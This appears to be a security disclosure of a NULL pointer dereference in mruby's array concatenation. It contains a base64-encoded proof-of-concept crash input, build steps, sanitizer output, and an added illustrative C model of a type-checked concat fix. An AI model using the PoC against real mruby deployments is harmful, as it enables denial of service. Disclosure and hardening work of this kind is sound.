There is a NULL Pointer Dereference in ary_concat (array.c:301). This bug has been found on the mruby latest commit (hash ecb28f4bf463483cf914c799d086b0cfff997aee) on Ubuntu 20.04 for x86_64/amd64.
The crash is not reproducible in a debug build, so a release build config must be used to reproduce it:
1- Clone the repo and build with ASAN (but in non-debug mode) using `MRUBY_CONFIG=build_config/poc_config.rb rake`, with `poc_config.rb` being:

```ruby
MRuby::Build.new do |conf|
  conf.toolchain :clang
  # include the GEM box
  conf.gembox 'full-core'
  conf.enable_sanitizer "address,undefined"
  conf.enable_bintest
  conf.enable_test
end
```
2- Use mruby to execute the poc (it is base64-encoded since it contains unprintable characters):

```
$ echo -ne 'R0M6OmNsYXNzLm5ld3tzdXBlciBzdXBlciBzdXBlcigmKQpiPTAsKuk9MH0=' | base64 -d > poc
$ ~/mruby/build/host/bin/mruby poc
/home/faraday/mruby/src/array.c:301:7: runtime error: member access within misaligned address 0x000000000001 for type 'struct RArray', which requires 8 byte alignment
0x000000000001: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/array.c:301:7 in
AddressSanitizer:DEADLYSIGNAL
=================================================================
==54835==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000012 (pc 0x00000055a515 bp 0x7ffe088eb5d0 sp 0x7ffe088ea940 T0)
==54835==The signal is caused by a READ memory access.
==54835==Hint: address points to the zero page.
    #0 0x55a515 in ary_concat /home/faraday/mruby/src/array.c:301:7
    #1 0x55a515 in mrb_ary_concat /home/faraday/mruby/src/array.c:324:3
    #2 0x5ae1c9 in mrb_vm_exec /home/faraday/mruby/src/vm.c:2622:9
    #3 0x59ad77 in mrb_vm_run /home/faraday/mruby/src/vm.c:1128:12
    #4 0x53f5b4 in mrb_mod_initialize /home/faraday/mruby/src/class.c:1648:5
    #5 0x5bc37b in mrb_vm_exec /home/faraday/mruby/src/vm.c:1633:18
    #6 0x59ad77 in mrb_vm_run /home/faraday/mruby/src/vm.c:1128:12
    #7 0x692370 in mrb_load_exec /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6883:7
    #8 0x69341f in mrb_load_detect_file_cxt /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6926:12
    #9 0x4c69ee in main /home/faraday/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
    #10 0x7f6682c1d0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #11 0x41c83d in _start (/home/faraday/mruby/build/host/bin/mruby+0x41c83d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/faraday/mruby/src/array.c:301:7 in ary_concat
==54835==ABORTING
```
This vulnerability is capable of making the mruby interpreter crash, thus affecting the availability of the system.
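A "misaligned address 0x000000000001 for type 'struct RArray'" in the sanitizer output is what a tagged immediate value (a small integer boxed with its low bit set) looks like once it is cast to a struct pointer without a type check; whether that is the exact mechanism in this report is not established by the trace, but it is the general failure class. The following is an added educational example, not mruby code and not mruby's actual mrb_value layout: a constructed model with hypothetical names (`value_t`, `box_int`, `box_array`, `ary_concat_checked`, and the `scenario_*` helpers) that shows the 0x1 address an unchecked cast would produce, and the tag check a hardened concat performs before dereferencing anything. It also handles the self-concat aliasing case, where the source and destination arrays are the same object.

```c
#include <stdint.h>
#include <stdlib.h>

/* Constructed model of a tagged-value VM (hypothetical names, not mruby's
 * mrb_value): a value_t is either a pointer to a heap struct array (low bit 0)
 * or a small integer immediate encoded as (n << 1) | 1. */
typedef uintptr_t value_t;

struct array {
  size_t len;
  size_t cap;
  long *items;
};

static value_t box_int(long n) { return ((value_t)n << 1) | 1; }
static value_t box_array(struct array *a) { return (value_t)a; }
static int value_is_array(value_t v) { return v != 0 && (v & 1) == 0; }

/* The address an unchecked cast would dereference as a struct. For the
 * immediate 0 it is 0x1, the same shape as the misaligned address in the
 * sanitizer output. Returned as an integer so it is never dereferenced here. */
static uintptr_t unchecked_array_address(value_t v) { return (uintptr_t)v; }

static struct array *array_new(size_t cap) {
  struct array *a = calloc(1, sizeof *a);
  if (a == NULL) return NULL;
  a->cap = cap ? cap : 1;
  a->items = calloc(a->cap, sizeof *a->items);
  if (a->items == NULL) { free(a); return NULL; }
  return a;
}

static int array_push(struct array *a, long v) {
  if (a->len == a->cap) {
    long *grown = realloc(a->items, a->cap * 2 * sizeof *grown);
    if (grown == NULL) return -1;
    a->items = grown;
    a->cap *= 2;
  }
  a->items[a->len++] = v;
  return 0;
}

static void array_free(struct array *a) {
  if (a != NULL) { free(a->items); free(a); }
}

enum { CONCAT_OK = 0, CONCAT_TYPE_ERROR = 1, CONCAT_NOMEM = 2 };

/* Hardened concat: check the tag before any pointer in `other` is used.
 * In a real VM this is where a TypeError would be raised instead of trusting
 * that the instruction which produced `other` already validated it. */
static int ary_concat_checked(struct array *self, value_t other) {
  if (!value_is_array(other)) return CONCAT_TYPE_ERROR;
  struct array *a2 = (struct array *)other;
  size_t n = a2->len;  /* snapshot: a2 may alias self and grow as we push */
  for (size_t i = 0; i < n; i++) {
    /* a2->items is re-read each iteration, so a realloc of self stays
     * visible when a2 == self. */
    if (array_push(self, a2->items[i]) != 0) return CONCAT_NOMEM;
  }
  return CONCAT_OK;
}

/* Scenario 1: [1, 2] + [3] through the checked path; returns the new length. */
static long scenario_concat_arrays(void) {
  struct array *a = array_new(2), *b = array_new(1);
  long len = -1;
  if (a != NULL && b != NULL) {
    array_push(a, 1); array_push(a, 2); array_push(b, 3);
    if (ary_concat_checked(a, box_array(b)) == CONCAT_OK) len = (long)a->len;
  }
  array_free(a); array_free(b);
  return len;
}

/* Scenario 2: [7, 8] concatenated with itself (aliasing edge case). */
static long scenario_concat_self(void) {
  struct array *a = array_new(1);
  long len = -1;
  if (a != NULL) {
    array_push(a, 7); array_push(a, 8);
    if (ary_concat_checked(a, box_array(a)) == CONCAT_OK) len = (long)a->len;
  }
  array_free(a);
  return len;
}

/* Scenario 3: an immediate where an array was expected. The checked path
 * returns an error code instead of reading through address 0x1. */
static int scenario_concat_immediate(void) {
  struct array *a = array_new(1);
  int rc = -1;
  if (a != NULL) rc = ary_concat_checked(a, box_int(0));
  array_free(a);
  return rc;
}
```

The point of the model is the ordering in `ary_concat_checked`: the tag test happens before the cast, so a non-array value is rejected with an error code (a TypeError in a real interpreter) rather than becoming a read from the zero page. The length snapshot before the loop is what keeps the self-concat case from looping over elements it is appending.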
This bug was found by Octavio Gianatiempo ([email protected]) and Octavio Galland ([email protected]) from Faraday Research Team.